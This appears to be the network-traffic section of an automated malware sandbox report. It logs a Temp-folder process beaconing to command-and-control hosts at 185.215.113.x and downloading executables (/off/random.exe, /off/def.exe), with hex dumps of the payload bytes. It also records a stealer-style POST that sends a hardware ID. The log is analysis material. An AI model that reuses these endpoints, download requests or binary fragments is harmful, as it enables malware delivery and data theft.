                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.921926022 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                                                                                              Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQ
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922203064 CET1236INData Raw: e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23 00 00 68 17 24 44 00 e8 2f f0 01 00 59 c3 e8 de 25 00 00 68 1c 24 44 00 e8 1e f0 01 00 59 c3 e8 ae e7 01 00 68 21 24 44 00 e8 0d f0 01 00 59
                                                                                                                                                                                                                                                              Data Ascii: h$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922288895 CET1236INData Raw: 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00
                                                                                                                                                                                                                                                              Data Ascii: OO_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922367096 CET248INData Raw: 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00
                                                                                                                                                                                                                                                              Data Ascii: j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922801971 CET1236INData Raw: 8b 75 08 57 8b f9 56 83 67 08 00 e8 eb e5 00 00 8a 46 10 8d 4f 20 88 47 10 8b 46 14 89 47 14 8a 46 18 88 47 18 8d 46 20 83 61 08 00 50 e8 c9 e5 00 00 8a 46 30 88 47 30 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 89 11 40 89 41 0c 89 51 08 88 51 10 89 51
                                                                                                                                                                                                                                                              Data Ascii: uWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&NW LjE$|I IF^jAZ @uSV5I3WjXSG
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922945023 CET1236INData Raw: 00 8b 41 0c 83 e8 01 74 29 83 e8 01 0f 84 d4 07 04 00 83 e8 01 0f 84 bb 07 04 00 83 e8 01 74 19 83 e8 03 74 0d 48 83 e8 01 0f 85 97 07 04 00 8a 01 c3 83 39 00 0f 95 c0 c3 8b 41 08 83 78 04 00 eb f3 55 8b ec 53 56 8b 75 08 33 db 57 8a d3 8b 0e 8d
                                                                                                                                                                                                                                                              Data Ascii: At)ttH9AxUSVu3WyQ>t(M@f9Xu8!tt_^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.922952890 CET248INData Raw: 7f 05 04 00 3b fb 0f 84 26 fe ff ff e9 72 05 04 00 83 38 05 0f 85 d0 fe ff ff ff 45 f4 8d 45 ec 89 7d ec 8d 8d 54 ff ff ff 50 47 e8 5a 03 00 00 8b 45 d8 8b 48 04 8b 85 58 ff ff ff 89 45 bc e9 a6 fe ff ff 83 e8 21 0f 85 23 01 00 00 8b 41 04 6a 7f
                                                                                                                                                                                                                                                              Data Ascii: ;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuWAjYf9HEHOTE]ETpXEE
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.923584938 CET1236INData Raw: 00 3b fb 0f 84 31 fd ff ff e9 85 04 04 00 ff 75 e8 ff 75 f4 ff 75 e4 ff 75 e0 53 52 ff 75 f0 33 db 53 e8 86 03 00 00 85 c0 78 02 8b f3 8d 4d 84 e8 1a 02 00 00 8d 8d 78 ff ff ff e8 0f 02 00 00 8d 8d 6c ff ff ff e8 04 02 00 00 8d 8d 60 ff ff ff e8
                                                                                                                                                                                                                                                              Data Ascii: ;1uuuuSRu3SxMxl`MTM_^[rU]AjYf9H}AjYf9HEE}xPG|EIE
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:26.923655987 CET1236INData Raw: 00 88 5c 24 19 88 5c 24 1a ff 15 28 c3 49 00 8d 44 24 13 50 ff 75 08 e8 c2 03 00 00 ff 15 18 c2 49 00 85 c0 0f 85 aa 00 04 00 a1 00 14 4d 00 85 c0 0f 84 b5 00 04 00 33 ff be 90 23 4d 00 47 3b c7 0f 84 b1 00 04 00 8d 44 24 11 50 51 68 00 14 4d 00
                                                                                                                                                                                                                                                              Data Ascii: \$\$(ID$PuIM3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa|$sY4=MMuW0M
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:27.041273117 CET1236INData Raw: 4d e0 e8 6c a0 00 00 8b 75 ac 8d 4d f0 e8 22 7a 00 00 8d 45 f0 50 8d 4d 90 e8 39 01 00 00 8b 7d f0 57 68 58 ca 49 00 e8 cf 1a 02 00 59 59 85 c0 0f 84 8b fd 03 00 57 68 30 ca 49 00 e8 ba 1a 02 00 59 59 85 c0 0f 84 92 fd 03 00 57 68 08 ca 49 00 e8
                                                                                                                                                                                                                                                              Data Ascii: MluM"zEPM9}WhXIYYWh0IYYWhIYYWhIYYu>M8]uMEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              8192.168.2.449835185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:31.272536039 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 33 35 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1013538001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:32.623694897 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              9192.168.2.449838185.215.113.16807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:32.745805025 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076092005 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:33 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 2895872
                                                                                                                                                                                                                                                              Last-Modified: Mon, 09 Dec 2024 21:07:46 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67575c22-2c3000"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 88 b9 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$, `@ ,,`Ui` @ @.rsrc`2@.idata 8@cdtvwakf++:@qjmihuav ,,@.taggant@,",@
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076122999 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076731920 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076832056 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.076842070 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.077644110 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.077708006 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.077723026 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.078088045 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.078212976 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:34.195509911 CET1236INData Raw: b6 97 b0 46 bb d1 72 11 9f 31 df 48 7c c0 84 6d d5 61 61 79 d8 f4 b8 4a 55 3e 58 62 4f 2e cc b7 45 eb 67 74 58 cb 98 90 92 cd 31 6e 63 38 9b 67 d8 e1 4b 78 ae 4c 74 73 61 f1 55 f5 a7 d7 cb 0c d1 e2 6c 24 9c f1 50 95 07 c6 a2 f4 a7 d7 cb 82 d6 de
                                                                                                                                                                                                                                                              Data Ascii: Fr1H|maayJU>XbO.EgtX1nc8gKxLtsaUl$Plvw|NV7|p?Jtq,8w.FY`w{&zsSN%l&zac`r?u|/5M^!Ow`ONQkP5k+hh2TmvFl6 v


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              10192.168.2.449868185.215.113.16807872C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:40.017160892 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.348684072 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:40 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 2895872
                                                                                                                                                                                                                                                              Last-Modified: Mon, 09 Dec 2024 21:07:48 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67575c24-2c3000"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 88 b9 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$, `@ ,,`Ui` @ @.rsrc`2@.idata 8@cdtvwakf++:@qjmihuav ,,@.taggant@,",@
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.348786116 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.348797083 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.348922968 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.349006891 CET896INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.349016905 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.349025965 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.349035978 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: d2ywpvaqmJmvzB}N:twHwt}@[xSa~ZMQ"nPvJsJ
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.349412918 CET1236INData Raw: 1b aa b6 38 a5 1c ff 09 62 fc 7d 7f da d0 71 90 19 e2 f1 62 59 0a 24 75 10 f0 db fb 8c f0 f1 41 db 4b 4c 78 f5 69 6b 14 dc f3 bd 51 17 07 73 61 15 df c4 56 d1 01 6d 40 b7 f2 38 7f 4e 92 6c 74 31 06 7a 5c 60 d2 8d 64 b1 ff 2e 6d f4 51 10 45 f7 ca
                                                                                                                                                                                                                                                              Data Ascii: 8b}qbY$uAKLxikQsaVm@8Nlt1z\`d.mQEL~2m>zpsRF>\xrsf7hZ'~x&6Z1xRBo,7_LR1fGr\gx34nx}]c}q:bUz%<0p,t_f|0)0} lN
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.349423885 CET1236INData Raw: 4a 0c 0f 5b 4c 21 75 b2 99 71 a3 94 7f 7f b8 81 41 0f c1 f8 a2 37 26 4b e2 15 7e 97 4d 18 4f 98 70 ec 9d ba 73 ea f6 f1 94 47 dc 89 77 91 bc 08 43 08 dd cf 28 41 74 c2 54 f8 b9 6d 93 e8 a1 3a 1d 30 c0 ca 40 5f d0 94 82 e1 d7 0f 22 4a de 9a a6 69
                                                                                                                                                                                                                                                              Data Ascii: J[L!uqA7&K~MOpsGwC(AtTm:0@_"Ji`wr6YY6~Qg|mVg{%)|Z6r{|qvCb,Hd2@cci]i|<aSdg(Na|X+DN}b|lz@1RnPvr
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.468508005 CET1236INData Raw: c7 15 2b 17 92 c7 b1 ab 48 a5 75 27 98 5e f8 e4 5b e5 6b 65 b1 20 98 1c 3b e2 ed 7c ec 27 78 a7 bd 37 b4 3e 1f 16 9f 50 47 b4 f0 b4 17 0a 91 12 b0 36 62 82 62 05 75 a4 bc c3 3d bd 9f 31 1c 53 85 4c 26 d5 ac fc 67 a8 e4 07 fc 52 10 06 c0 2c ad 25
                                                                                                                                                                                                                                                              Data Ascii: +Hu'^[ke ;|'x7>PG6bbu=1SL&gR,%bC_X"vH=2F};s(_i=pwO"cLKr5)`b{u{y@R[tg!vvS@jgaKfhNZhxP{x4hHl})_l


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              11192.168.2.449870185.215.113.206806796C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:40.244571924 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.574444056 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:41 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.576658964 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDG
                                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                                              Content-Length: 211
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 37 41 33 30 41 32 43 37 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="hwid"9D7A30A2C7A51915334237------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build"stok------IJJKKJJDAAAAAKFHJJDG--
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.038409948 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:41 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                              Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              12192.168.2.449874185.215.113.43807660C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:41.338077068 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 33 35 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1013539001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.733125925 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              13192.168.2.44987934.107.221.82805932C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 9, 2024 23:09:42.027201891 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                              Host: detectportal.firefox.com
